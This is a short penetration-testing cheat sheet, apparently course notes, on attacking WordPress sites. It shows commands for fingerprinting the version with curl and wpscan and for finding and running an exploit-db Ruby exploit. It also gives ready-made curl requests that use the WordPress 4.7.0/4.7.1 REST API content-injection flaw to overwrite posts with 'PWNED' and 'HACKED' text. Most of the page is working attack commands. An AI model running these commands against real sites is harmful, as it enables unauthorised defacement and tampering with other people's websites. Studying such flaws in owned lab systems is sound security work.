WordPress
Curl to get WordPress version
curl -s http://www.test.com/wordpress/ | grep generator
Use wpscan to run vulnerability scan against wordpress site
wpscan --no-update --url http://www.test.com/wordpress/ | grep Title
Use searchsploit against version of wordpress site
searchsploit wordpress 4.7.1
# Review exploit
searchsploit 41224 --examine
# or
cat /opt/exploitdb/exploits/linux/webapps/41224.rb
# To run exploit (Could be python or ruby)
ruby /opt/exploitdb/exploits/linux/webapps/41224.rb
curl --data "id=4xxxxx&title=PWNED&content=Epic PWNAGE" http://www.sec542.org/wordpress/index.php/wp-json/wp/v2/posts/4
Curl exploit for WordPress 4.7.0/4.7.1 Content Injection
Modify id=5 and end of url per what id you get when you run
curl http://www.test.com/wordpress/wp-json/wp/v2/posts
. The below will modify a post. Can also be done via Atom: https://blog.websecurify.com/2017/02/hacking-wordpress-4-7-0-1.html
curl --data "id=5xxxxx&title=HACKED&content=THIS SITE IS EXPLOITABLE" http://www.test.com/wordpress/index.php/wp-json/wp/v2/posts/5
Last updated
Was this helpful?